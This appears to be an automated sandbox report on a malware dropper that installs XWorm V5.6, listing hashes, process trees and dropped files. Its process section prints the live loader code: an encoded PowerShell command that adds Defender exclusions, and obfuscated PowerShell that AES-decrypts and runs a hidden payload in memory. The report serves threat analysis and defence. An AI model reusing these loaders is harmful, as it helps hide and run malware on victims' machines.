Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
01-07-2024 03:03
Static task
static1
Behavioral task
behavioral1
Sample
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
Resource
win7-20240508-en
General
-
Target
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe
-
Size
15.6MB
-
MD5
ad3893ee2a8e40f2700236672635f5aa
-
SHA1
80f3c0bc398c473e32eeb1420218be6a5feb291d
-
SHA256
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727
-
SHA512
748db720695d028c034367f0af26d80ced9700dc497a82ce5a4ce578b39fb24c0f869ddbae3b542b15718523fa3cd29c11f78ded0f9f748ac4954256472a4111
-
SSDEEP
196608:IZu1YQGj4ZSo3jXkpiliRElNhT7kiibJ488hEipzLmCKg4EFJ9UHytjAIgwX4FVE:+u1OjJEIZulNyHytjma0VvjZ6
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
Processes:
Xworm V5.6.exexworm.bat.exexfixer.bat.exepid process 2644 Xworm V5.6.exe 2548 xworm.bat.exe 2648 xfixer.bat.exe -
Loads dropped DLL 3 IoCs
Processes:
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.execmd.execmd.exepid process 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe 2604 cmd.exe 2816 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
xworm.bat.exexfixer.bat.exepowershell.exepid process 2548 xworm.bat.exe 2648 xfixer.bat.exe 2092 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
xworm.bat.exexfixer.bat.exepowershell.exedescription pid process Token: SeDebugPrivilege 2548 xworm.bat.exe Token: SeDebugPrivilege 2648 xfixer.bat.exe Token: SeDebugPrivilege 2092 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.execmd.execmd.exeXworm V5.6.exedescription pid process target process PID 1240 wrote to memory of 2092 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 1240 wrote to memory of 2092 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 1240 wrote to memory of 2092 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 1240 wrote to memory of 2092 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe powershell.exe PID 1240 wrote to memory of 2604 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1240 wrote to memory of 2604 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1240 wrote to memory of 2604 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1240 wrote to memory of 2604 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1240 wrote to memory of 2816 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1240 wrote to memory of 2816 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1240 wrote to memory of 2816 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1240 wrote to memory of 2816 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe cmd.exe PID 1240 wrote to memory of 2644 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 1240 wrote to memory of 2644 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 1240 wrote to memory of 2644 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 1240 wrote to memory of 2644 1240 1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe Xworm V5.6.exe PID 2604 wrote to memory of 2548 2604 cmd.exe xworm.bat.exe PID 2604 wrote to memory of 2548 2604 cmd.exe xworm.bat.exe PID 2604 wrote to memory of 2548 2604 cmd.exe xworm.bat.exe PID 2604 wrote to memory of 2548 2604 cmd.exe xworm.bat.exe PID 2816 wrote to memory of 2648 2816 cmd.exe xfixer.bat.exe PID 2816 wrote to memory of 2648 2816 cmd.exe xfixer.bat.exe PID 2816 wrote to memory of 2648 2816 cmd.exe xfixer.bat.exe PID 2816 wrote to memory of 2648 2816 cmd.exe xfixer.bat.exe PID 2644 wrote to memory of 2708 2644 Xworm V5.6.exe WerFault.exe PID 2644 wrote to memory of 2708 2644 Xworm V5.6.exe WerFault.exe PID 2644 wrote to memory of 2708 2644 Xworm V5.6.exe WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"C:\Users\Admin\AppData\Local\Temp\1bb56efc0a5848106b94aed4e2e3e9e05935ad16c50b31b22c1c8f4bf6e3e727.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AdABsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAdQBpACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\xworm.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xworm.bat.exe"xworm.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_TxKiz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xworm.bat').Split([Environment]::NewLine);foreach ($_CASH_XMOQm in $_CASH_TxKiz) { if ($_CASH_XMOQm.StartsWith(':: @')) { $_CASH_ssYCl = $_CASH_XMOQm.Substring(4); break; }; };$_CASH_ssYCl = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ssYCl, '_CASH_', '');$_CASH_CfCmx = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ssYCl);$_CASH_tsEof = New-Object System.Security.Cryptography.AesManaged;$_CASH_tsEof.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_tsEof.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_tsEof.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+ZLOxcnfG7i9YTWJ7vLTmQj82ou3KT503uJ1I+7Wo6U=');$_CASH_tsEof.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/z4iXtMuBf06DnNNej/bVw==');$_CASH_KWHai = $_CASH_tsEof.CreateDecryptor();$_CASH_CfCmx = $_CASH_KWHai.TransformFinalBlock($_CASH_CfCmx, 0, $_CASH_CfCmx.Length);$_CASH_KWHai.Dispose();$_CASH_tsEof.Dispose();$_CASH_fYpGJ = New-Object System.IO.MemoryStream(, $_CASH_CfCmx);$_CASH_FImSp = New-Object System.IO.MemoryStream;$_CASH_aydNz = New-Object System.IO.Compression.GZipStream($_CASH_fYpGJ, [IO.Compression.CompressionMode]::Decompress);$_CASH_aydNz.CopyTo($_CASH_FImSp);$_CASH_aydNz.Dispose();$_CASH_fYpGJ.Dispose();$_CASH_FImSp.Dispose();$_CASH_CfCmx = $_CASH_FImSp.ToArray();$_CASH_MWQwC = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_CfCmx);$_CASH_eABCx = $_CASH_MWQwC.EntryPoint;$_CASH_eABCx.Invoke($null, (, [string[]] ('')))3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\xfixer.bat" "2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xfixer.bat.exe"xfixer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_CnGzR = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\xfixer.bat').Split([Environment]::NewLine);foreach ($_CASH_qdZmU in $_CASH_CnGzR) { if ($_CASH_qdZmU.StartsWith(':: @')) { $_CASH_ZoWEj = $_CASH_qdZmU.Substring(4); break; }; };$_CASH_ZoWEj = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZoWEj, '_CASH_', '');$_CASH_fXadG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZoWEj);$_CASH_HMtAt = New-Object System.Security.Cryptography.AesManaged;$_CASH_HMtAt.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_HMtAt.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_HMtAt.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fIynBYcBUpBBez+nt2djmwJqlIyvat7HzgVRpfM2ODQ=');$_CASH_HMtAt.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5/SuT9a8EJc5rjsiLxvRg==');$_CASH_tRKDk = $_CASH_HMtAt.CreateDecryptor();$_CASH_fXadG = $_CASH_tRKDk.TransformFinalBlock($_CASH_fXadG, 0, $_CASH_fXadG.Length);$_CASH_tRKDk.Dispose();$_CASH_HMtAt.Dispose();$_CASH_xnUdL = New-Object System.IO.MemoryStream(, $_CASH_fXadG);$_CASH_gkSYz = New-Object System.IO.MemoryStream;$_CASH_UMTAN = New-Object System.IO.Compression.GZipStream($_CASH_xnUdL, [IO.Compression.CompressionMode]::Decompress);$_CASH_UMTAN.CopyTo($_CASH_gkSYz);$_CASH_UMTAN.Dispose();$_CASH_xnUdL.Dispose();$_CASH_gkSYz.Dispose();$_CASH_fXadG = $_CASH_gkSYz.ToArray();$_CASH_lwuuH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_fXadG);$_CASH_pYHCE = $_CASH_lwuuH.EntryPoint;$_CASH_pYHCE.Invoke($null, (, [string[]] ('')))3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2644 -s 7323⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\xfixer.batFilesize
304KB
MD528a668375e0d2b1cfa1d847fc44934d4
SHA1bd0d7df2f07f879e97e02d13d9eebf0a584fabe7
SHA256cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160
SHA512d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c
-
C:\Users\Admin\AppData\Roaming\xworm.batFilesize
317KB
MD5ada0b01d33911547bb0086e0ed152484
SHA1ec81374c631f94c536b51dfb8c42c063bf72ca78
SHA256aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1
SHA5126aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26
-
C:\Users\Admin\AppData\Roaming\xworm.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
\Users\Admin\AppData\Roaming\Xworm V5.6.exeFilesize
14.9MB
MD556ccb739926a725e78a7acf9af52c4bb
SHA15b01b90137871c3c8f0d04f510c4d56b23932cbc
SHA25690f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405
SHA5122fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1
-
memory/2644-38-0x00000000003D0000-0x00000000012B8000-memory.dmpFilesize
14.9MB